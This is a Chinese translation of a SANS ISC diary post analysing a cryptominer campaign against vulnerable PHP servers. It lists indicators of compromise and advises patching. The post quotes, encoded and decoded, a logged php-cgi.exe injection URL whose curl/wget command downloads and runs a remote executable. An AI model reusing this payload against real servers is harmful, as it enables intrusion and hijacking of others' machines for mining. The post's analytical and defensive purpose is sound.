PHP服务器可能正在被挖矿!

admin 2025年1月13日23:12:34评论6 views字数 2473阅读8分14秒阅读模式

PHP服务器可能正在被挖矿!

PHP服务器可能正在被挖矿!

免责声明

道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

PHP服务器可能正在被挖矿!

正文

SANS DShield 项目收集了来自 DShield 项目参与者的各种日志。在查看“首次出现”的 URL 页面时,我发现了一个有趣的 URL 并深入调查。记录的 URL 如下:

/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F[redacted]%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe%20%7C%7C%20wget%20--no-check-certificate%20http%3A%2F%2F[redacted]%2Fdr0p.exe%20%26%26%20

我们可以通过 CyberChef 或 Burp Decoder 等网络代理工具使其更易读:

/cgi-bin/php-cgi.exe?arg=Content-Type: text/plain<?php system('curl -L -k -O http://[redacted]/dr0p.exe && ./dr0p.exe || wget --no-check-certificate http://[redacted]/dr0p.exe &&

顾名思义,这似乎是一个旨在下载二级有效载荷的可执行文件。对文件名进行快速搜索后,发现了一个最近提交到 VirusTotal(VT)的样本1,其 SHA256 哈希值

d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36

经过简短的动态恶意软件逆向工程,我们得到了一些非常有趣的发现。首先,dr0p.exe 从 23.27.51.244 获取了一个名为 pkt1.exe(e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562)的二级文件。根据 Shodan 的查询结果(参见图 1),这个位于美国的 IP 地址开放了 4 个端口(22、80、110 和 6664),并且在 80 端口上运行着 EvilBit Block Explorer。

PHP服务器可能正在被挖矿!

在 Shodan 上查询 23.27.51.244

文件 pkt1.exe 进一步生成了一个名为 packetcrypt.exe 的可执行文件,并将一个 PacketCrypt(PKT Classic)钱包地址(pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a)作为参数传递。让我们通过原生的 PKT Classic(PKTC)区块链浏览器2查看一下到目前为止的挖矿情况。参见图 2,该钱包的主人目前似乎已经挖到了 5 个 PKTC(按当前价格计算大约为 0.0021785 USDT)。

PHP服务器可能正在被挖矿!

PacketCrypt Classic(PKTC)钱包活动

观察到的网络 URL 活动似乎利用了存在漏洞(例如最近的 CVE-2024-4577)的 PHP 服务器或配置不当的 PHP 服务器,这些服务器出于只有系统所有者才知道的原因,允许公众无限制地访问 php-cgi.exe。如果你已经有一段时间没有检查你的 PHP 服务器了(这本不应该发生!),也许这是提醒系统所有者修补和审计他们的网络服务器漏洞以及由加密货币矿工引起的意外性能问题的一个温和提示。

附注:在调查过程中,注意到 PacketCrypt(PKT)项目从工作量证明方法PKTClassicPKTC演变为新的 Stake-to-Earn(目前称为 PKT)方法3因此,传统项目(PKTC)和当前迭代(PKT)的加密货币有所区别。在本文中,利用存在漏洞的 PHP 服务器挖取的加密货币是 PKTC。

入侵指标(IoCs):

23.27.51.244(获取 pkt1.exe 的 IP 地址)

d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36(dr0p.exe 的 SHA256 哈希值)

e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562(pkt1.exe 的 SHA256 哈希值)

717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397(packetcrypt.exe 的 SHA256 哈希值)

pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a(PKTC 钱包地址)

参考文献:

1. https://www.virustotal.com/gui/file/d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36

2.https://www.pkt.world/explorer?wallet=pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a&minutes=1440&pools=all

3. https://crypto.pkt.cash/announcements/pktclassic-adopts-new-ticker-pktc/

PHP服务器可能正在被挖矿!

声明

本文来源于:

https://isc.sans.edu/diary/PacketCrypt+Classic+Cryptocurrency+Miner+on+PHP+Servers/31564/

本公众号仅作翻译整理

PHP服务器可能正在被挖矿!

点分享

PHP服务器可能正在被挖矿!

点收藏

PHP服务器可能正在被挖矿!

点在看

PHP服务器可能正在被挖矿!

点点赞

原文始发于微信公众号(道一安全):PHP服务器可能正在被挖矿!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月13日23:12:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP服务器可能正在被挖矿!http://cn-sec.com/archives/3624761.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息